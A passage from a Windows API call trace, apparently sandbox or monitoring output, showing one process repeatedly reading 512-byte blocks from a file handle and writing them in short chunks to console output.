lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.871] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.871] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType (hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType 
(hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType (hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType (hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType (hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.872] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.872] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.872] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType (hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType (hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] GetFileType (hFile=0x50) returned 0x1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] GetFileType (hFile=0x50) returned 0x1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] GetFileType (hFile=0x50) returned 0x1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] GetFileType (hFile=0x50) returned 0x1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, 
lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] GetFileType (hFile=0x50) returned 0x1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] GetFileType (hFile=0x50) returned 0x1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.873] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.873] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] GetFileType (hFile=0x50) returned 0x1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] GetFileType (hFile=0x50) returned 0x1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] GetFileType (hFile=0x50) returned 0x1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 
[0142.874] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] GetFileType (hFile=0x50) returned 0x1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] GetFileType (hFile=0x50) returned 0x1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] GetFileType (hFile=0x50) returned 0x1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] GetFileType (hFile=0x50) returned 0x1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] GetFileType (hFile=0x50) returned 0x1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] WriteFile (in: hFile=0x50, 
lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.921] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.921] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] GetFileType (hFile=0x50) returned 0x1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] GetFileType (hFile=0x50) returned 0x1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] GetFileType (hFile=0x50) returned 0x1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] GetFileType (hFile=0x50) returned 0x1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.922] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0142.922] GetFileType (hFile=0x50) returned 0x1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] GetFileType (hFile=0x50) returned 0x1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] GetFileType (hFile=0x50) returned 0x1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] GetFileType (hFile=0x50) returned 0x1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.923] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.923] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, 
lpOverlapped=0x0) returned 1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] GetFileType (hFile=0x50) returned 0x1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] GetFileType (hFile=0x50) returned 0x1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] GetFileType (hFile=0x50) returned 0x1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] GetFileType (hFile=0x50) returned 0x1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] GetFileType (hFile=0x50) returned 0x1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] GetFileType (hFile=0x50) returned 0x1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 
| out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] GetFileType (hFile=0x50) returned 0x1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] GetFileType (hFile=0x50) returned 0x1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.924] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.924] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] GetFileType (hFile=0x50) returned 0x1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] GetFileType (hFile=0x50) returned 0x1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0142.925] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 
[0142.925] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.925] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.925] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 
[0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.926] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.927] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, 
